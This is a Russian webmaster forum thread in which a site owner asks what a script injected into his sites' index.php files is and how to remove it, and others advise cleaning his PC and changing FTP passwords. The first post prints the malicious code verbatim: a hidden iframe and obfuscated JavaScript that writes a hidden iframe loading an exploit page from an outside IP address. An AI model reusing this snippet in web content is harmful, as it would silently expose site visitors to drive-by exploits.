На страницу 1, 2 След. |
|
m_Stasuk Дизайнер |
Зарегистрирован: 23.12.2007
Сообщений: 5967
|
Обратиться по нику
|
m_Stasuk |
Ответить с цитатой | | |
|
Привет!
У меня такая история, взял хостинг к которому можно прикрутить 5 доменов.
4 сайта не вордпресе, один сайт на движке, который писал один знакомый.
Короче обнаружил на всех сайтах вот такую запись
Код: |
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v479c9fa343af2(v479c9fa343efc){ function v479c9fa3442e5 () {return 16;} return(parseInt(v479c9fa343efc,v479c9fa3442e5()));}function v479c9fa344af0(v479c9fa344eea){ function v479c9fa345b0a () {return 2;} var v479c9fa3452fe='';for(v479c9fa3456f8=0; v479c9fa3456f8<v479c9fa344eea.length; v479c9fa3456f8+=v479c9fa345b0a()){ v479c9fa3452fe+=(String.fromCharCode(v479c9fa343af2(v479c9fa344eea.substr(v479c9fa3456f8, v479c9fa345b0a()))));}return v479c9fa3452fe;} document.write(v479c9fa344af0('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3037663863207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3531383837292B27653437626563313466625C272077696474683D353833206865696768743D3839207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
|
Эта запись стоит в исходном коде в самом низу. Кто подскажет что это и как бороться.
Написал в сапорт хостинга, там сказали типа разбирайтесь сами.
пример сайта _photoles.ru могу все написать, но думаю ни к чему. |
|
|
|
|
|
|
m_Stasuk Дизайнер |
Зарегистрирован: 23.12.2007
Сообщений: 5967
|
Обратиться по нику
|
m_Stasuk |
Ответить с цитатой | | |
|
да и еще, как я понял это модуль, который перенаправляет моих посетителей, точнее не перенаправляет, а накручивает моих посетителей на счетчик других сайтов. Можно как-то понять каких? Я так понимаю что какой-то сеошник кидает какого-то рекламодателе через меня. Хотел бы короче узнать кто это и этого чувака. Если конечно он в пределах досягаемости. |
|
|
|
|
|
Зарабатываю на рускамзе
Ростов-на-Дону
|
m_Stasuk Дизайнер |
Зарегистрирован: 23.12.2007
Сообщений: 5967
|
Обратиться по нику
|
m_Stasuk |
Ответить с цитатой | | |
|
реально эту дуру видит только каспер. Если у кого-то каспер, то посмотрите плиз как называется вирус |
|
|
|
|
|
Зарабатываю на рускамзе
Ростов-на-Дону
|
m_Stasuk Дизайнер |
Зарегистрирован: 23.12.2007
Сообщений: 5967
|
Обратиться по нику
|
m_Stasuk |
Ответить с цитатой | | |
|
В кратце:
заражает файл index.php, расположенный в корневой директории сайта, путём дописывания в его конец вредоносного? javascript кода....
Делает это предположительно в автоматическом режиме...
такой троян гремел год назад у agava.ru
заражает файлы index.php |
|
|
|
|
|
Зарабатываю на рускамзе
Ростов-на-Дону
|
m_Stasuk Дизайнер |
Зарегистрирован: 23.12.2007
Сообщений: 5967
|
Обратиться по нику
|
|
|
Зарабатываю на рускамзе
Ростов-на-Дону
|
Жека V.I.P. |
Зарегистрирован: 07.12.2005
Сообщений: 2173
|
Обратиться по нику
|
Жека |
Ответить с цитатой | | |
|
1) чистить свой комп, вполне вероятно, что доступ к сайту был получен трояном через ваш комп
2) после чистки домашнего компа менять пароли от хостинга (обязательно от фтп, желательно от http панели), либо поменять пароли с другого компа
3) удалить эту хрень на индексных страницах
ps менять пароли без чистки своего компа бесмысленно - появится опять. |
|
|
|
|
|
Подпись |
Li-Hua Чинамэн |
Зарегистрирован: 25.12.2005
Сообщений: 11544
|
Обратиться по нику
|
Li-Hua |
Ответить с цитатой | | |
|
m_Stasuk, у тебя от фтп пассы увели и ифрейм поставляли или ты сателлиты купил готовые такие? я не понял из первого поста |
|
|
|
|
|
|
m_Stasuk Дизайнер |
Зарегистрирован: 23.12.2007
Сообщений: 5967
|
Обратиться по нику
|
m_Stasuk |
Ответить с цитатой | | |
|
я не знаю как получилось. Все 5 сайтов делал я сам. Похоже что меня ломанули все же. |
|
|
|
|
|
Зарабатываю на рускамзе
Ростов-на-Дону
|
Li-Hua Чинамэн |
Зарегистрирован: 25.12.2005
Сообщений: 11544
|
Обратиться по нику
|
Li-Hua |
Ответить с цитатой | | |
|
Ну тогда тебя или хостинг ломанули, меняй пассы, апдейти ВП, проверь свой комп. |
|
|
|
|
|
|
agrasoff Опытный |
Зарегистрирован: 08.12.2007
Сообщений: 106
|
Обратиться по нику
|
agrasoff |
Ответить с цитатой | | |
|
Жека писал(а): |
1) чистить свой комп, вполне вероятно, что доступ к сайту был получен трояном через ваш комп
2) после чистки домашнего компа менять пароли от хостинга (обязательно от фтп, желательно от http панели), либо поменять пароли с другого компа
3) удалить эту хрень на индексных страницах
ps менять пароли без чистки своего компа бесмысленно - появится опять.
|
да, самое частое - это ftp-аккаунты у тебя берут, которые локально на твоем компе хранятся.. и все действия, которые жека перечислил очень ценные :)
а чем ты пользуешься для работы с ftp? интересно просто. вот в total commander'e пароли в открытом виде хранятся. поэтому их очень
легко оттуда взять и попользовать. |
|
|
|
|
|
Хостинг в US. Budget, Business, Dedicated. 375 GB за $3 в месяц. |
m_Stasuk Дизайнер |
Зарегистрирован: 23.12.2007
Сообщений: 5967
|
Обратиться по нику
|
m_Stasuk |
Ответить с цитатой | | |
|
короче этот модуль отравлял мне жизнь все это время.
сейчас нашли решение. Файлу index.php поставили атрибуты 444. Это скорее всего должно искоренить проблему. |
|
|
|
|
|
Зарабатываю на рускамзе
Ростов-на-Дону
|
Dmitr Профессионал |
Зарегистрирован: 23.04.2007
Сообщений: 926
|
Обратиться по нику
|
Dmitr |
Ответить с цитатой | | |
|
только там ничего не накручивается, там на сплойты на сплойты всё ...
а если уж антивирь ворчит, то слова мои подтверждает. по сути Жека отписал элементарно что сделать. |
|
|
|
|
|
|
densa Гуру |
Зарегистрирован: 27.06.2006
Сообщений: 1018
|
Обратиться по нику
|
densa |
Ответить с цитатой | | |
|
скорее всего у тебя пароли от фтп увели. Если так то хоть какие права поставь, переписать его всеравно можно будет. Работай над защитой своего компа |
|
|
|
|
|
Узнай как отдохнуть в Таиланде самостоятельно
Я болею за Ермак |
m_Stasuk Дизайнер |
Зарегистрирован: 23.12.2007
Сообщений: 5967
|
Обратиться по нику
|
m_Stasuk |
Ответить с цитатой | | |
|
то что Жека написал я делал 500 000 миллионов раз. Не помогло.
Чищу комп, меняю пароли, но через время модуль появляется опять.
Сейчас пока затишье. |
|
|
|
|
|
Зарабатываю на рускамзе
Ростов-на-Дону
|
IseeDeadPeople Объединенная Электрическая |
Зарегистрирован: 06.12.2005
Сообщений: 21724
|
Обратиться по нику
|
IseeDeadPeople |
Ответить с цитатой | | |
|
а.. лала.. пам пам.. тум тум..
а бывает в наших краях... лам лам пам пам...
когда даже платный хостер.. ла ла пам пам
.......... на всем своем .. машинке ... ла ла пам пам СТАВИТ НА НЕКОТОРОЕ ВРЕМЯ .. ла ла пам пам ТИПА ИФР#ЙМ какого нить троя как АДДОН РЕВРИТЕР НА ВЕСЬ ВЫВОД ХТМЛ контента с машинке..
пали что за хостер |
|
|
|
|
|
LIVE SEX |
|